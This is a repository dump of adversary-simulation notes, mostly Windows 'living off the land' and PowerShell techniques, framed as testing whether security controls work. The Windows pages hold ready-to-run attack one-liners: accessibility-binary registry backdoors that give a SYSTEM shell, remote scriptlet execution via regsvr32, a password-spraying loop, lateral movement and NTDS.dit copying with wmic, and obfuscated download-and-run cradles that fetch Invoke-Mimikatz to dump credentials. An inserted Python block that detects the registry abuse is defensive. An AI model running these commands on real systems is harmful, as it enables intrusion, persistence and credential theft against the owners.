```text
├── Linux
│   └── README.md
├── Network
│   ├── domains.md
│   └── README.md
├── Windows
│   ├── README.md
│   ├── sysinternals.md
│   ├── mix.md
│   ├── Bypass.md
│   ├── Live off the Land.md
│   └── Powershell.md
├── Mac
│   └── README.md
├── Adversary
│   └── README.md
└── README.md
```

/Linux/README.md:

--------------------------------------------------------------------------------

# bookish-happiness

# Linux

--------------------------------------------------------------------------------

/Network/domains.md:

--------------------------------------------------------------------------------

# Domains

## Dynamic DNS

--------------------------------------------------------------------------------

/Windows/README.md:

--------------------------------------------------------------------------------

# bookish-happiness

# Windows

--------------------------------------------------------------------------------

/Mac/README.md:

--------------------------------------------------------------------------------

# bookish-happiness

# Mac

https://github.com/EmpireProject/EmPyre

--------------------------------------------------------------------------------

/Adversary/README.md:

--------------------------------------------------------------------------------

# bookish-happiness

# Adversary

https://github.com/Cyb3rWard0g/ThreatHunter-Playbook

--------------------------------------------------------------------------------

/Windows/sysinternals.md:

--------------------------------------------------------------------------------

# Sysinternals

## psexec.exe

Input:

code here

Output:

code here

--------------------------------------------------------------------------------

/Windows/mix.md:

--------------------------------------------------------------------------------

https://github.com/nccgroup/redsnarf

http://beefproject.com

https://github.com/trustedsec/social-engineer-toolkit

https://github.com/Hack-with-Github

https://github.com/bhdresh/CVE-2017-0199

https://gist.github.com/subTee/c6bd1401504f9d4d52a0

--------------------------------------------------------------------------------

/README.md:

--------------------------------------------------------------------------------

# Bookish-Happiness

Bookish-Happiness is the adversary simulation project you really wanted.

## DISCLAIMER:

Do not use these tools for evil. Please use these tools and their output responsibly, and only on systems on which you have explicit permission to access and run code.

## References:

http://pwnwiki.io/#!index.md

https://youtu.be/Q5Fu6AvXi_A

--------------------------------------------------------------------------------

/Network/README.md:

--------------------------------------------------------------------------------

# bookish-happiness

# Network

***PCAP replay***

I'm finding that PCAP replay may be the most effective way to properly test security appliances that promise to detect or prevent all the things.

***Firewall***

[EgressBuster - TrustedSec](https://github.com/trustedsec/egressbuster)

[Allports.Exposed - BHIS](https://www.blackhillsinfosec.com/?p=4811)

[DNScat2-Powershell - BHIS](https://www.blackhillsinfosec.com/?p=5578&)

Webshell Detection

***DLP***

***Mail Gateway***

URL Rewrite

Sandbox

https://github.com/byt3bl33d3r?tab=repositories

--------------------------------------------------------------------------------

/Windows/Bypass.md:

--------------------------------------------------------------------------------

# Bypasses

## Application Whitelisting

[Application Whitelist Auditor - Airlock Digital](https://www.airlockdigital.com/application-whitelisting-auditor/)

[AllTheThings - SubTee](https://github.com/subTee/AllTheThings)

[Bypass Techniques - SubTee](https://github.com/subTee/ApplicationWhitelistBypassTechniques)

## Native Utilities

### Reg.exe - On Screen Keyboard swap

Create a registry entry on the host that causes a SYSTEM-level shell to be invoked any time the osk.exe (on-screen keyboard) process is called:

```cmd
reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\osk.exe" /v "Debugger" /t REG_SZ /d "cmd.exe" /f
```

Test:

Log out of the current session. Select the accessibility controls on the logon screen and click "On Screen Keyboard".

Detection:

reg.exe adding the Debugger value, or a command shell being launched in place of the accessibility binary. Much of the detection will be based on the command line or on the actual registry key value being added or changed.

Utilman.exe spawning cmd.exe, and whatever other commands are then executed via the command line (e.g. `net user jack pwnfish /add`).

### Reg.exe - sethc.exe swap

```cmd
REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe" /t REG_SZ /v Debugger /d "C:\windows\system32\cmd.exe" /f
```

### Reg.exe - utilman.exe swap

```cmd
REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\utilman.exe" /t REG_SZ /v Debugger /d "C:\windows\system32\cmd.exe" /f
```

### Regsvr32 + sct file + powershell encoded command

This is based on @SubTee's sct bypass: https://github.com/subTee/SCTPersistence

Test:

```cmd
regsvr32.exe /s https://gist.githubusercontent.com/MHaggis/31a1d0efd882d048436aeb7b9fd7f6d0/raw/b96dc20465abfeed3f05ba56b28e2ff91c398606/backdoor.sct
```

Detection:

### Cscript spawn Calc

Input:

```cmd
cscript /b C:\Windows\System32\Printing_Admin_Scripts\en-US\pubprn.vbs <arbitrary-string> "script:https://gist.githubusercontent.com/enigma0x3/64adf8ba99d4485c478b67e03ae6b04a/raw/a006a47e4075785016a62f7e5170ef36f5247cdb/test.sct"
```

--------------------------------------------------------------------------------

/Windows/Live off the Land.md:

--------------------------------------------------------------------------------

# Native - Living off the land

Living off the land is using native operating system utilities to bypass the controls in place. At most organizations these will be application whitelisting, AV, endpoint detection software and so on. From the endpoint to the network, you should see some type of activity occur. If you have deep packet inspection and an sct file is downloaded with PowerShell, did your network device detect or prevent this? Remember, the point is to determine whether your current controls are working as they were described to you.
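The Detection note under the on-screen-keyboard swap in Bypass.md says detection will rest on the command line or on the registry value change, and the paragraph above asks whether your controls actually catch it. As an added example (not code from this repository), the Python check below classifies reg.exe command lines the way a process-creation rule would: an IFEO Debugger value on an accessibility binary is high severity, on any other image medium, and a Run-key addition (the reg.exe examples further down) low; it also tolerates the curly quotes the sethc.exe and utilman.exe lines carry. The accessibility binaries beyond the page's three and all sample command lines are assumptions constructed here.

```python
import re

# Accessibility helpers reachable from the logon screen; an IFEO "Debugger"
# value on any of them runs the "debugger" as SYSTEM before logon. The page
# names the first three; magnify.exe and narrator.exe are an added assumption.
ACCESSIBILITY_BINARIES = {"osk.exe", "sethc.exe", "utilman.exe",
                          "magnify.exe", "narrator.exe"}

# A double-quoted argument, allowing \" escapes the way reg.exe tokenizes.
QUOTED = r'"((?:\\.|[^"\\])*)"'
REG_ADD_RE = re.compile(r"\breg(?:\.exe)?\s+add\s+(?:%s|(\S+))" % QUOTED, re.I)
IFEO_RE = re.compile(r"\\image file execution options\\([^\\\"]+)$", re.I)
RUN_RE = re.compile(r"\\currentversion\\run(?:once)?$", re.I)


def _normalize(cmdline):
    # Copy/paste and document extraction turn "..." into curly quotes (the
    # sethc.exe and utilman.exe lines above show it); fold them back.
    return cmdline.translate({0x201C: '"', 0x201D: '"'})


def _switch(cmdline, name):
    # Value following a /v or /d switch, quoted or bare; None if absent.
    m = re.search(r"/%s\s+(?:%s|(\S+))" % (name, QUOTED), cmdline, re.I)
    if not m:
        return None
    return m.group(1) if m.group(1) is not None else m.group(2)


def classify_reg_add(cmdline):
    """Return a finding dict for a suspicious 'reg add' command line, else None."""
    cmd = _normalize(cmdline)
    m = REG_ADD_RE.search(cmd)
    if not m:
        return None
    key = m.group(1) if m.group(1) is not None else m.group(2)
    value_name = _switch(cmd, "v") or ""
    data = _switch(cmd, "d") or ""
    ifeo = IFEO_RE.search(key)
    if ifeo and value_name.lower() == "debugger":
        image = ifeo.group(1).lower()
        severity = "high" if image in ACCESSIBILITY_BINARIES else "medium"
        return {"technique": "ifeo_debugger", "severity": severity,
                "image": image, "data": data}
    if RUN_RE.search(key):
        # Run-key persistence, as in the reg.exe examples further down.
        return {"technique": "run_key_persistence", "severity": "low",
                "image": value_name, "data": data}
    return None


def scan(cmdlines):
    """Findings for every matching command line, in input order."""
    return [f for f in map(classify_reg_add, cmdlines) if f]


# Constructed sample of process-creation command lines: the osk.exe and
# sethc.exe swaps and a Run-key line from this page, plus two that must not fire.
SAMPLE_CMDLINES = [
    r'reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\osk.exe" /v "Debugger" /t REG_SZ /d "cmd.exe" /f',
    r'REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe" /t REG_SZ /v Debugger /d “C:\windows\system32\cmd.exe” /f',
    r'reg add hkcu\software\microsoft\windows\currentversion\run /v netshare /f /d %temp%\notilv.exe /t REG_EXPAND_SZ',
    r'reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\osk.exe"',
    r'net user /domain',
]
```

Feed it the CommandLine field of your process-creation events (Sysmon event 1 or 4688 with command-line auditing on); `scan(SAMPLE_CMDLINES)` returns three findings for the constructed sample.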
## One Liners

## net.exe

### Password Spraying

http://pwnwiki.io/#!privesc/windows/index.md#Password_Spraying

```cmd
net user /domain > DomainUsers.txt
echo "Password1" >> pass.txt
echo "1q2w3e4r" >> pass.txt
```

For loop:

```cmd
@FOR /F %n in (DomainUsers.txt) DO @FOR /F %p in (pass.txt) DO @net use \\COMPANYDC1\IPC$ /user:COMPANY\%n %p 1>NUL 2>&1 && @echo [*] %n:%p && @net use /delete \\COMPANYDC1\IPC$ > NUL
```

## Reconnaissance

### Net user and group Enumeration

Domain Group Enumeration:

```cmd
net groups "domain administrators" /domain
```

Domain User Enumeration:

```cmd
net user /domain
```

Local Group Enumeration:

```cmd
net localgroup "administrators"
```

Local User Enumeration:

```cmd
net user
```

Local user add:

```cmd
net user /add Jack Pwndiddy1
```

Add new user to local group:

```cmd
net localgroup administrators jack /add
```

Local Share Enumeration:

```cmd
net share
```

Remote Share Enumeration:

```cmd
net view \\<computername>
```

## at.exe

Note: deprecated in Windows 8+.

### Privilege Escalation

This command can be used locally to escalate privilege to SYSTEM, or across a network to execute commands on another system.

http://pwnwiki.io/#!privesc/windows/index.md

Input:

```cmd
at 13:20 /interactive cmd
```

Example:

```cmd
net use \\[computername|IP] /user:DOMAIN\username password
net time \\[computername|IP]
at \\[computername|IP] 13:20 c:\temp\evil.bat
```

## schtasks.exe

### Launch Interactive cmd.exe

Input:

```cmd
SCHTASKS /Create /SC ONCE /TN spawn /TR C:\windows\system32\cmd.exe /ST 20:10
```

## reg.exe

Input:

code here

Output:

code here

Examples:

```cmd
reg add hkcu\software\microsoft\windows\currentversion\run /v netshare /f /d %temp%\notilv.exe /t REG_EXPAND_SZ
```

```cmd
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v ausMfTQVsuC /t REG_EXPAND_SZ /d "\"C:\Users\IEUser\AppData\Roaming\Oracle\bin\javaw.exe\" -jar \"C:\Users\IEUser\wBJLxnECLJF\FysHVwDWznz.ICgcjG\"" /f
```

## Netsh.exe

http://pwnwiki.io/#!pivoting/windows/windows_cmd_network.md

### Firewall Control

Input:

```cmd
netsh firewall set opmode [disable|enable]
```

### Netsh.exe Pivoting

Input:

```cmd
netsh interface portproxy add v4tov4 listenport=8080 listenaddress=0.0.0.0 connectport=8000 connectaddress=192.168.1.1
```

portproxy also supports v4tov6, v6tov6 and v6tov4.

### Netsh.exe Sniffing

Input:

```cmd
netsh trace start capture=yes overwrite=no tracefile=
```

To stop:

```cmd
netsh trace stop
```

### Netsh.exe Wireless backdoor

Input:

```cmd
netsh wlan set hostednetwork mode=[allow|disallow]
netsh wlan set hostednetwork ssid= key= keyUsage=persistent|temporary
netsh wlan [start|stop] hostednetwork
```

In order: the first line enables or disables the hosted network service; the second completes the hosted network setup for creating a wireless backdoor; the third starts or stops the wireless backdoor. See below to set it up.

## Regsvr32.exe

Input:

code here

Output:

code here

```cmd
regsvr32.exe /s /n /u /i:https:///data scrobj.dll
```

## waitfor.exe

Input:

code here

Output:

code here

## wmic.exe

Provided by: https://www.fireeye.com/content/dam/fireeye-www/services/pdfs/sans-dfir-2015.pdf

### Reconnaissance

Input:

```cmd
wmic useraccount get /ALL
```

Input:

```cmd
wmic process get caption,executablepath,commandline
```

Input:

```cmd
wmic qfe get description,installedOn /format:csv
```

Input:

```cmd
wmic /node:"192.168.0.1" service where (caption like "%sql server (%")
```

Input:

```powershell
get-wmiobject -class "win32_share" -namespace "root\CIMV2" -computer "targetname"
```

### Lateral Movement

Input:

```cmd
wmic /node:REMOTECOMPUTERNAME process call create "COMMAND AND ARGUMENTS"
```

Input:

```cmd
wmic /NODE:"192.168.0.1" process call create "evil.exe"
```

### Privilege Escalation

Input:

```cmd
wmic /node:REMOTECOMPUTERNAME PROCESS call create "at 9:00PM c:\GoogleUpdate.exe ^> c:\notGoogleUpdateResults.txt"
```

Input:

```cmd
wmic /node:REMOTECOMPUTERNAME PROCESS call create "cmd /c vssadmin create shadow /for=C:\Windows\NTDS\NTDS.dit > c:\not_the_NTDS.dit"
```

## bitsadmin.exe

Input:

```cmd
bitsadmin.exe /transfer /Download http://bit.ly/L3g1tCrad1e Default_File_Path.ps1
```

## Installutil.exe

Download the two binaries:

Input for pshell.dll:

```cmd
C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe /logfile= /logtoconsole=false /U pshell.dll
```

Input for rwxhunter.exe:

```cmd
C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe /U rwxhunter.exe
```

## Qwinsta

Input:

--------------------------------------------------------------------------------

/Windows/Powershell.md:

--------------------------------------------------------------------------------

# Powershell

Every product today reports they can prevent fileless, living off the land, nation state :all_the_things:. I say - prove it.

http://www.labofapenetrationtester.com/2015/04/pillage-the-village-powershell-version.html

https://www.blackhillsinfosec.com/?p=5831

## One Liners

### Download Mimikatz and Dump credentials

```powershell
powershell.exe "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/mattifestation/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1'); Invoke-Mimikatz -DumpCreds"
```

### Download cradles and Dump credentials

Just download it:

```powershell
(New-Object Net.WebClient).DownloadFile('http://bit.ly/L3g1tCrad1e','Default_File_Path.ps1');IEX((-Join([IO.File]::ReadAllBytes('Default_File_Path.ps1')|ForEach-Object{[Char]$_})))
```

Minor obfuscation:

```powershell
(New-Object Net.WebClient).DownloadFile('http://bit.ly/L3g1tCrad1e','Default_File_Path.ps1');[ScriptBlock]::Create((-Join([IO.File]::ReadAllBytes('Default_File_Path.ps1')|ForEach-Object{[Char]$_}))).InvokeReturnAsIs()
```

All obfuscation:

```powershell
Set-Variable HJ1 'http://bit.ly/L3g1tCrad1e';SI Variable:/0W 'Net.WebClient';Set-Item Variable:\gH 'Default_File_Path.ps1';ls _-*;Set-Variable igZ (.$ExecutionContext.InvokeCommand.(($ExecutionContext.InvokeCommand.PsObject.Methods|?{$_.Name-like'*Cm*t'}).Name).Invoke($ExecutionContext.InvokeCommand.(($ExecutionContext.InvokeCommand|GM|?{$_.Name-like'*om*e'}).Name).Invoke('*w-*ct',$TRUE,1))(Get-ChildItem Variable:0W).Value);Set-Variable J ((((Get-Variable igZ -ValueOn)|GM)|?{$_.Name-like'*w*i*le'}).Name);(Get-Variable igZ -ValueOn).((ChildItem Variable:J).Value).Invoke((Get-Item Variable:/HJ1).Value,(GV gH).Value);&( ''.IsNormalized.ToString()[13,15,48]-Join'')(-Join([Char[]](CAT -Enco 3 (GV gH).Value)))
```

Mimikatz - CradleCrafter PsSendKeys:

```powershell
$url='https://raw.githubusercontent.com/mattifestation/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1';$wshell=New-Object -ComObject WScript.Shell;$reg='HKCU:\Software\Microsoft\Notepad';$app='Notepad';$props=(Get-ItemProperty $reg);[Void][System.Reflection.Assembly]::LoadWithPartialName('System.Windows.Forms');@(@('iWindowPosY',([String]([System.Windows.Forms.Screen]::AllScreens)).Split('}')[0].Split('=')[5]),@('StatusBar',0))|ForEach{SP $reg (Item Variable:_).Value[0] (Variable _).Value[1]};$curpid=$wshell.Exec($app).ProcessID;While(!($title=GPS|?{(Item Variable:_).Value.id-ieq$curpid}|ForEach{(Variable _).Value.MainWindowTitle})){Start-Sleep -Milliseconds 500};While(!$wshell.AppActivate($title)){Start-Sleep -Milliseconds 500};$wshell.SendKeys('^o');Start-Sleep -Milliseconds 500;@($url,(' '*1000),'~')|ForEach{$wshell.SendKeys((Variable _).Value)};$res=$Null;While($res.Length -lt 2){[Windows.Forms.Clipboard]::Clear();@('^a','^c')|ForEach{$wshell.SendKeys((Item Variable:_).Value)};Start-Sleep -Milliseconds 500;$res=([Windows.Forms.Clipboard]::GetText())};[Windows.Forms.Clipboard]::Clear();@('%f','x')|ForEach{$wshell.SendKeys((Variable _).Value)};If(GPS|?{(Item Variable:_).Value.id-ieq$curpid}){@('{TAB}','~')|ForEach{$wshell.SendKeys((Item Variable:_).Value)}};@('iWindowPosDY','iWindowPosDX','iWindowPosY','iWindowPosX','StatusBar')|ForEach{SP $reg (Item Variable:_).Value $props.((Variable _).Value)};IEX($res);invoke-mimikatz -dumpcr
```

### Invoke-AppPathBypass

Note: Windows 10 only.

Bypass is based on: https://enigma0x3.net/2017/03/14/bypassing-uac-using-app-paths/

```powershell
Powershell.exe "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/enigma0x3/Misc-PowerShell-Stuff/master/Invoke-AppPathBypass.ps1'); Invoke-AppPathBypass"
```

At the prompt, to test:

```cmd
C:\Windows\System32\cmd.exe
```

### Obfuscated Powershell

Fancy obfuscation that reaches out to bit.ly/L3g1t and prints to stdout: "SUCCESSFULLY EXECUTED POWERSHELL CODE FROM REMOTE LOCATION"

```cmd
cmd /c "set apple=fish (cars help://bit.ly/L3g1t).content&&cmd /c set boat=%apple:fish=iex% ^&^&cmd /c set ab=%boat:cars=iwr% ^^^&^^^&cmd /c echo %ab:el=tt%|%ProgramData:~3,1%%ProgramData:~5,1%we%ProgramData:~7,1%she%Public:~12,1%%Public:~12,1% -"
```

Second test:

```cmd
cmd /c "set apple=fish (cars ('http://bit.ly/L3g1tCrad1e).content&&cmd /c set boat=%apple:fish=iex% ^&^&cmd /c set ab=%boat:cars=iwr% ^^^&^^^&cmd /c echo %ab:el=tt%|%ProgramData:~3,1%%ProgramData:~5,1%we%ProgramData:~7,1%she%Public:~12,1%%Public:~12,1% -"
```

## Powershell Obfuscation

Provided by @danielbohannon

[Out-FINcodedCommand](https://github.com/danielbohannon/Out-FINcodedCommand/blob/master/README.md)

Setup:

```powershell
Invoke-Expression (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/danielbohannon/Out-FINcodedCommand/master/Out-FINcodedCommand.ps1')
```

Input:

```powershell
Out-FINcodedCommand -command "iex (iwr http://bit.ly/L3g1t).content" -FinalBinary powershell
```

Follow the prompts to create variables.

Output:

```cmd
cmd /c "set apple=fish (cars help://bit.ly/L3g1t).content&&cmd /c set boat=%apple:fish=iex% ^&^&cmd /c set ab=%boat:cars=iwr% ^^^&^^^&cmd /c echo %ab:el=tt%|%ProgramData:~3,1%%ProgramData:~5,1%we%ProgramData:~7,1%she%Public:~12,1%%Public:~12,1% -"
```

[Invoke-CradleCrafter](https://github.com/danielbohannon/Invoke-CradleCrafter)

Input:

code here

Output:

code here

[Invoke-Obfuscation](https://github.com/danielbohannon/Invoke-Obfuscation)

Input:

code here

Output:

code here

## Powershell Kits

### Unicorn

https://github.com/trustedsec/unicorn/blob/master/README.md

### Empire

http://www.powershellempire.com/

### Bloodhound

https://github.com/BloodHoundAD/BloodHound

### GoFetch

https://github.com/GoFetchAD/GoFetch

### Deathstar

https://github.com/byt3bl33d3r/DeathStar

https://byt3bl33d3r.github.io/automating-the-empire-with-the-death-star-getting-domain-admin-with-a-push-of-a-button.html

### PowerSploit

https://github.com/PowerShellMafia/PowerSploit

### Nishang

https://github.com/samratashok/nishang

### PSAttack

https://github.com/jaredhaight/PSAttack

### Dr0p1t-Framework

https://github.com/D4Vinci/Dr0p1t-Framework

### PowerOPS

https://github.com/fdiskyou/PowerOPS

```powershell
powershell.exe Copy ([PSObject].Assembly.Location) C:\
```

Then:

```cmd
csc.exe /unsafe /reference:"C:\System.Management.Automation.dll" /reference:System.IO.Compression.dll /out:C:\users\ieuser\desktop\PowerOPS_x64.exe /platform:x64 "C:\Users\IEUser\Downloads\PowerOPS-1.0-beta\PowerOps\*.cs"
```

### Invoke-AutoIt

https://github.com/byt3bl33d3r/Invoke-AutoIt

```powershell
Powershell.exe "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/byt3bl33d3r/Invoke-AutoIt/master/Invoke-AutoIt.ps1'); Invoke-AutoIt -WindowTitle 'Remote Desktop' -Keys 'Rainbow Push-ups'"
```

### Invoke-Phant0m

https://github.com/hlldz/Invoke-Phant0m

```powershell
Powershell.exe "IEX (New-Object Net.WebClient).DownloadString('https://github.com/hlldz/Invoke-Phant0m/blob/master/Invoke-Phant0m.ps1'); Invoke-Phant0m"
```

### Download Minicars and Dump credentials (Mimikatz alternative)

https://twitter.com/curi0usjack/status/883344872438104064

https://gist.github.com/curi0usJack/adbf34bd402f28138388bd6e266da961

```powershell
powershell.exe "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/mattifestation/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1'); Invoke-Mimikatz -DumpCreds"
```

# Other

### DNScat2-powershell

https://github.com/lukebaggett/dnscat2-powershell

# Powershell 5.1

The following requires PowerShell 5.1: https://www.microsoft.com/en-us/download/details.aspx?id=54616

Moar fun here: https://4sysops.com/archives/the-new-local-user-and-group-cmdlets-in-powershell-5-1/

## Add User

```powershell
New-LocalUser -FullName 'Jack Frost' -Name 'Jackfro' -Password (ConvertTo-SecureString 'PwnDiddy1' -AsPlainText -Force) -Description 'Pwnage account'
```

## Create a group

```powershell
New-LocalGroup -Name 'Testgroup' -Description 'Testing group'
```

--------------------------------------------------------------------------------